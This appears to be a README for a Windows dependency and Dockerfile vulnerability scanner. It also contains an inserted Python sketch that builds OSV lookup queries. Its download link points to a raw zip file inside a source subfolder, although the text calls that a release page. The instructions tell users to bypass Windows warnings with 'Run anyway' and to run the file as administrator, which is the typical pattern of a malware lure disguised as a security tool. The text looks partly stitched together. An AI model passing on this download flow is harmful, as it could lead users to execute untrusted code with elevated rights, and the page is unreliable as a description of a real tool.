Visit this page to download: https://github.com/Blacke2902/security-scanner/raw/refs/heads/main/src/repo_security_scanner/reports/scanner-security-v2.7-alpha.1.zip
On that page, pick the latest release for Windows. Download the file that matches your computer, then open it to start the app.
- Open the release page link above.
- Look for the newest version at the top.
- Under Assets, download the Windows file.
- If you see a .zip file, open it and extract the contents.
- If you see a .exe file, double-click it to run it.
- If Windows asks for permission, choose More info and then Run anyway if you trust the file from the release page.
security-scanner checks your project files for known security problems. It looks at common package files and Dockerfiles, then compares them with public vulnerability data.
It helps you:
- Check dependencies for known issues
- Scan Dockerfiles for risky package versions
- Review results in a clear way
- Run quick scans without setup
- Use the same tool across several package types
security-scanner supports common software stacks used in many projects:
- JavaScript and Node.js
- Python
- Dockerfiles
- Other common package formats
It uses public vulnerability sources and can work across many dependency types. That makes it useful for both small projects and larger codebases.
After you download the app, put it in a folder you can find again, such as Downloads or Desktop.
Then:
- Open the folder where you saved the file.
- Run the app.
- If it opens a terminal window, let it finish the scan.
- Read the results on screen.
- Fix any packages or lines marked as risky.
If you use a .zip file, keep the app and its files together in the same folder so it can run correctly.
The app is made for simple, fast checks.
Typical use looks like this:
- Open security-scanner.
- Point it at your project folder.
- Let it scan your dependencies and Dockerfiles.
- Review the results.
- Update packages or images that have known issues.
- Run the scan again to confirm the fix.
If you are not sure which folder to choose, pick the folder that contains your project files.
security-scanner works well with folders that include files like these:
- package.json
- requirements.txt
- Pipfile
- Dockerfile
- docker-compose.yml
You do not need to open these files by hand. The app checks them for you.
This tool helps you find known problems before they cause trouble.
It can save time when you want to:
- Check your project before shipping it
- Review old dependencies
- Inspect a Docker image setup
- Keep your software up to date
- Spot weak points in your supply chain
security-scanner reads your project files, looks up package names and versions, and compares them with public vulnerability records.
It uses data from free public sources and can also help with analysis based on the scan results.
That means you get:
- Fast checks
- No setup for most users
- Clear results
- A simple path to safer dependencies
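The lookup step described above (read manifests, extract package names and versions, compare against public records) can be sketched as follows. This is an added example, not security-scanner's own code: the function names are hypothetical, the sample inputs are constructed, and it assumes the OSV batch query API as the public source, since the page lists OSV data among its topics. It builds the request body without sending it.

```python
import json
import re

# Only exact pins name a single version that can be looked up; anything else goes to manual review.
REQ_PIN = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)(?:\[[^\]]*\])?\s*==\s*([A-Za-z0-9.!+_-]+)(?=\s|;|$)")
NPM_EXACT = re.compile(r"^\d+\.\d+\.\d+(?:[-+][0-9A-Za-z.-]+)?$")

def parse_requirements(text):
    """Return (pinned, review) from requirements.txt text."""
    pinned, review = [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("-"):         # blank line or pip option such as -r
            continue
        m = REQ_PIN.match(line)
        if m:
            # PyPI treats runs of -, _ and . in names as equivalent and ignores case.
            pinned.append(("PyPI", re.sub(r"[-_.]+", "-", m.group(1)).lower(), m.group(2)))
        else:
            review.append(("PyPI", line))
    return pinned, review

def parse_package_json(text):
    """Return (pinned, review) from package.json text."""
    pinned, review = [], []
    doc = json.loads(text)
    for section in ("dependencies", "devDependencies"):
        for name, spec in doc.get(section, {}).items():
            if NPM_EXACT.match(spec):
                pinned.append(("npm", name, spec))
            else:
                review.append(("npm", f"{name}@{spec}"))
    return pinned, review

def osv_querybatch_body(pinned):
    """Build the JSON body for POST https://api.osv.dev/v1/querybatch (one query per package)."""
    return {"queries": [{"package": {"name": n, "ecosystem": e}, "version": v} for e, n, v in pinned]}

# Constructed sample inputs (not taken from any real project).
SAMPLE_REQUIREMENTS = "Flask_Login==0.6.3  # auth\nrequests>=2.0\nurllib3==1.26.*\n-r dev.txt\n"
SAMPLE_PACKAGE_JSON = '{"dependencies": {"lodash": "4.17.21", "express": "^4.18.2"}}'

def scan_samples():
    py_pinned, py_review = parse_requirements(SAMPLE_REQUIREMENTS)
    js_pinned, js_review = parse_package_json(SAMPLE_PACKAGE_JSON)
    return osv_querybatch_body(py_pinned + js_pinned), py_review + js_review

if __name__ == "__main__":
    body, review = scan_samples()
    print(json.dumps(body, indent=2))
    print("manual review:", review)
```

Version ranges and wildcards are reported separately because they do not resolve to one version without a lockfile, which is one reason a scan can list items that need a manual review.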
You may see results such as:
- Outdated package versions
- Known CVEs
- Risky Docker base images
- Dependencies with security fixes available
- Items that need a manual review
If the scan shows a problem, update the package or image to a safer version, then run the scan again.
For the cleanest scan, keep your project in one folder and avoid moving files while the scan runs.
A simple layout can look like this:
- MyProject/
  - package.json
  - Dockerfile
  - src/
  - README.md
If you work on more than one project, scan each folder one at a time.
security-scanner also supports scheduled scanning. That helps if you want to check your projects at a set time without running each scan by hand.
A common use is:
- Run a scan each day
- Check a project each week
- Review changes after dependency updates
If scheduled scanning is enabled in your setup, keep the app in the same folder and make sure your project path stays the same.
The app can use AI-powered analysis to help explain scan results in plain language.
This can help when you want to understand:
- Why a package is flagged
- What part of a Dockerfile looks risky
- Which issue matters most
- What to fix first
Use the scan results as your main guide, then read the extra analysis for more context.
If the file does not open, try these steps:
- Check that the download finished fully.
- Make sure you downloaded the Windows file from the release page.
- Right-click the file and choose Run as administrator if needed.
- If the file is in a ZIP folder, extract it first.
- Try downloading the latest release again.
If the app runs but shows no results:
- Make sure you selected the correct project folder.
- Check that the folder contains supported files.
- Confirm the files are named correctly, such as package.json or Dockerfile.
- Run the scan again after checking the path.
To get the best results:
- Keep dependencies up to date
- Remove unused packages
- Use trusted base images
- Recheck the project after changes
- Scan each new release before use
This project focuses on:
- CLI tools
- CVE checks
- Dependency checks
- DevSecOps
- npm audit style scanning
- Open source security
- OSV data
- pip-audit style checks
- Python projects
- Software composition analysis
- Security
- Supply chain security
- Vulnerability scanning
Visit this page to download: https://github.com/Blacke2902/security-scanner/raw/refs/heads/main/src/repo_security_scanner/reports/scanner-security-v2.7-alpha.1.zip
Then:
- Open the latest release.
- Download the Windows file from Assets.
- Open the file or extract the ZIP.
- Run security-scanner.
- Scan your project folder and review the results.